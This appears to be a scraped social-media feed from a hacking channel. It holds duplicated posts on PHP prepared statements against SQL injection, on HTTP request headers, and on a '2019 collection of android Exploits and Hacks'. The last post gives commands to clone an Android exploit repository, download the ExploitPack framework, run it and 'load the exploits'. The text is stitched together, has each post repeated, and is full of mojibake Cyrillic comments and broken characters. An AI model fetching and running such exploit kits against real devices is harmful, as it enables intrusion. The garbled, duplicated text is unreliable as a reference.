A type of SQL injection attack is possible because the values (data) for the SQL query are transmitted along with the query itself. Since the data is not separate from the SQL code, it can affect the logic of the whole expression. Fortunately, MySQL offers a way to transfer data separately from the code. This method is called prepared queries .
> Execution of prepared queries consists of two stages: first, a query template is formed - a regular SQL expression, but without real values, and then, separately, values for this template are transferred to MySQL.
The first stage is called preparation, and the second - expression. A prepared request can be executed several times, passing different values there.
1) Stage of preparation
At the stage of preparation, an SQL query is generated, where the place signs will contain question marks - placeholders. These placeholders will later be replaced with real values. The query template is sent to the MySQL server for analysis and parsing.
Example:
$sql = "SELECT * FROM cities WHERE name = ?";
$stmt = mysqli_prepare($link, $sql);
2) This code will form a prepared expression to fulfill your request.
The preparation is in progress. When the request is launched, PHP binds the real values to the placeholders and sends them to the server. The function is responsible for passing the values to the prepared request mysqli_stmt_bind_param(). It takes the type and the variables themselves:
mysqli_stmt_bind_param($stmt, 's', $_GET['search']);
After executing the query, you can get its result in the mysqli_result format with the function mysqli_stmt_get_result():
$res = mysqli_stmt_get_result($stmt);
// ΡΡΠ΅Π½ΠΈΠ΅ Π΄Π°Π½Π½ΡΡ
while ($row = mysqli_fetch_assoc($res)) {
// Π°ΡΡΠΎΡΠΈΠ°ΡΠΈΠ²Π½ΡΠΉ ΠΌΠ°ΡΡΠΈΠ² Ρ ΠΎΡΠ΅ΡΠ΅Π΄Π½ΠΎΠΉ Π·Π°ΠΏΠΈΡΡΡ ΠΈΠ· ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΠ°
var_dump($row);
}
3) The server shields the values of the variables associated with the request automatically. Bound variables are sent to the server separately from the request and cannot affect it. The server uses these values directly at runtime, after the expression template has been processed. Bound parameters do not need to be escaped, since they are never substituted directly into the query string.
THATS ALL!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Protect YouR Php site from sql attack :
fb.com/UndercOdeTestingCompany
PART 3-end :
> Prepared Expressions
A type of SQL injection attack is possible because the values (data) for the SQL query are transmitted along with the query itself. Since the data is not separate from the SQL code, it can affect the logic of the whole expression. Fortunately, MySQL offers a way to transfer data separately from the code. This method is called prepared queries .
> Execution of prepared queries consists of two stages: first, a query template is formed - a regular SQL expression, but without real values, and then, separately, values for this template are transferred to MySQL.
The first stage is called preparation, and the second - expression. A prepared request can be executed several times, passing different values there.
1) Stage of preparation
At the stage of preparation, an SQL query is generated, where the place signs will contain question marks - placeholders. These placeholders will later be replaced with real values. The query template is sent to the MySQL server for analysis and parsing.
Example:
$sql = "SELECT * FROM cities WHERE name = ?";
$stmt = mysqli_prepare($link, $sql);
2) This code will form a prepared expression to fulfill your request.
The preparation is in progress. When the request is launched, PHP binds the real values to the placeholders and sends them to the server. The function is responsible for passing the values to the prepared request mysqli_stmt_bind_param(). It takes the type and the variables themselves:
mysqli_stmt_bind_param($stmt, 's', $_GET['search']);
After executing the query, you can get its result in the mysqli_result format with the function mysqli_stmt_get_result():
$res = mysqli_stmt_get_result($stmt);
// ΡΡΠ΅Π½ΠΈΠ΅ Π΄Π°Π½Π½ΡΡ
while ($row = mysqli_fetch_assoc($res)) {
// Π°ΡΡΠΎΡΠΈΠ°ΡΠΈΠ²Π½ΡΠΉ ΠΌΠ°ΡΡΠΈΠ² Ρ ΠΎΡΠ΅ΡΠ΅Π΄Π½ΠΎΠΉ Π·Π°ΠΏΠΈΡΡΡ ΠΈΠ· ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΠ°
var_dump($row);
}
3) The server shields the values of the variables associated with the request automatically. Bound variables are sent to the server separately from the request and cannot affect it. The server uses these values directly at runtime, after the expression template has been processed. Bound parameters do not need to be escaped, since they are never substituted directly into the query string.
THATS ALL!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HTTP protocol and work with headers guide :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> HTTP protocol
How WWW (World Wide Web, Web) works in a nutshell:
1) the user's browser (client) sends a request to the server with the site address (URL);
2) the server receives this request and gives the client the content it needs.
3) In other words, the entire modern web is built on a model of client-server interaction. And to make this whole process possible, a universal protocol language is needed that both the server and browser will understand. There is such a protocol, but it is called HTTP.
π¦ How HTTP works, and why do we need to know ? π¦
> You can program in PHP without knowing the HTTP protocol, but there are a number of situations where you need to know how the web server works to solve problems. After all, PHP is, first of all, a server programming language.
> The HTTP protocol is very simple and consists essentially of two parts:
Request / response headers
Request / Response Bodies.
First comes a list of headers, then an empty string, and then (if any) the body of the request / response.
> Both the client and the server can send headers and the response body to each other, but in the case of the client, the available headers will be one, and the server will be different. Let's take a step-by-step look at how the work using the HTTP protocol will look in the case when the user wants to download the main page of the Vkontakte social network.
1) The user's browser establishes a connection with the vk.com server and sends the following request:
GET / HTTP / 1.1
Host: vk.com
2) The server accepts the request and sends a response:
HTTP/1.1 200 OK
Server: Apache
<html>
<head>
<title>ΠΠΠΎΠ½ΡΠ°ΠΊΡΠ΅</title>
</head>
<!-- ΠΎΡΡΠ°Π»ΡΠ½ΠΎΠΉ ΠΊΠΎΠ½ΡΠ΅Π½Ρ ΡΡΡΠ°Π½ΠΈΡΡ Π½ΠΈΠΆΠ΅ -->
3) The browser accepts the response and displays the finished page
> Most of all, we are interested in the very first step, where the browser initiates a request to the vk.com server.
Let us consider in more detail what is happening there. The first line of the query defines several important parameters, namely:
> The method by which the content will be requested;
Page address;
Protocol version.
GETIs a method (verb) that we use to access the specified page.
GETis the most commonly used method because it tells the server that the client just wants to read the specified document. But besides GETthere are other methods, we will consider one of them in the next section.
> After the method there is an indication of the page address - URI (universal resource identifier). In our case, we request the main page of the site, so just a slash is used /.
The last in this line is the protocol version and almost always it will beHTTP/1.1
> After a line indicating the main parameters, a list of headers always fo1llows, which give the server additional useful information: the name and version of the browser, language, encoding, caching parameters, and so on.
> Among all these headers that are transmitted during each request, there is one mandatory and most important one - this is the heading Host. It determines the domain address that the client browser requests.
> Having received a request, the server searches for a site with a domain from the header Host, as well as the specified page.
If the requested site and page are found, a response is sent to the client:
HTTP/1.1 200 OK
> This answer means that everything is fine, the document is found and will be sent to the client.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HTTP protocol and work with headers guide :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> HTTP protocol
How WWW (World Wide Web, Web) works in a nutshell:
1) the user's browser (client) sends a request to the server with the site address (URL);
2) the server receives this request and gives the client the content it needs.
3) In other words, the entire modern web is built on a model of client-server interaction. And to make this whole process possible, a universal protocol language is needed that both the server and browser will understand. There is such a protocol, but it is called HTTP.
π¦ How HTTP works, and why do we need to know ? π¦
> You can program in PHP without knowing the HTTP protocol, but there are a number of situations where you need to know how the web server works to solve problems. After all, PHP is, first of all, a server programming language.
> The HTTP protocol is very simple and consists essentially of two parts:
Request / response headers
Request / Response Bodies.
First comes a list of headers, then an empty string, and then (if any) the body of the request / response.
> Both the client and the server can send headers and the response body to each other, but in the case of the client, the available headers will be one, and the server will be different. Let's take a step-by-step look at how the work using the HTTP protocol will look in the case when the user wants to download the main page of the Vkontakte social network.
1) The user's browser establishes a connection with the vk.com server and sends the following request:
GET / HTTP / 1.1
Host: vk.com
2) The server accepts the request and sends a response:
HTTP/1.1 200 OK
Server: Apache
<html>
<head>
<title>ΠΠΠΎΠ½ΡΠ°ΠΊΡΠ΅</title>
</head>
<!-- ΠΎΡΡΠ°Π»ΡΠ½ΠΎΠΉ ΠΊΠΎΠ½ΡΠ΅Π½Ρ ΡΡΡΠ°Π½ΠΈΡΡ Π½ΠΈΠΆΠ΅ -->
3) The browser accepts the response and displays the finished page
> Most of all, we are interested in the very first step, where the browser initiates a request to the vk.com server.
Let us consider in more detail what is happening there. The first line of the query defines several important parameters, namely:
> The method by which the content will be requested;
Page address;
Protocol version.
GETIs a method (verb) that we use to access the specified page.
GETis the most commonly used method because it tells the server that the client just wants to read the specified document. But besides GETthere are other methods, we will consider one of them in the next section.
> After the method there is an indication of the page address - URI (universal resource identifier). In our case, we request the main page of the site, so just a slash is used /.
The last in this line is the protocol version and almost always it will beHTTP/1.1
> After a line indicating the main parameters, a list of headers always fo1llows, which give the server additional useful information: the name and version of the browser, language, encoding, caching parameters, and so on.
> Among all these headers that are transmitted during each request, there is one mandatory and most important one - this is the heading Host. It determines the domain address that the client browser requests.
> Having received a request, the server searches for a site with a domain from the header Host, as well as the specified page.
If the requested site and page are found, a response is sent to the client:
HTTP/1.1 200 OK
> This answer means that everything is fine, the document is found and will be sent to the client.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019 collection of android Exploits and Hacks
Fb.com/UndercOdeTestingcompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sundaysec/Android-Exploits.git
> Recommend you grab exploitpack latest version
wget https://github.com/juansacco/exploitpack/archive/master.zip
2) Extract then Navigate into the folder and type:
3) java -jar ExploitPack.jar
4) Load the exploits
π¦Common Tools(In mobile Exploits):
> SSH
> VNC server
> A compiler (gcc / agcc)
> Android SDK (adb!)
> XCode
> Jailbroken iDevice
> Rooted Android Device
@ Μ΅ΝMΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019 collection of android Exploits and Hacks
Fb.com/UndercOdeTestingcompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/sundaysec/Android-Exploits.git
> Recommend you grab exploitpack latest version
wget https://github.com/juansacco/exploitpack/archive/master.zip
2) Extract then Navigate into the folder and type:
3) java -jar ExploitPack.jar
4) Load the exploits
π¦Common Tools(In mobile Exploits):
> SSH
> VNC server
> A compiler (gcc / agcc)
> Android SDK (adb!)
> XCode
> Jailbroken iDevice
> Rooted Android Device
@ Μ΅ΝMΜ΅Ν Μ ΜrΜΆΜ.Μ΅Μ Μ·Ν BΜ΄ΝOΜ·ΜTΜΆΜNΜ΄ΜEΜΆΝTΜΆΜ (tm
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.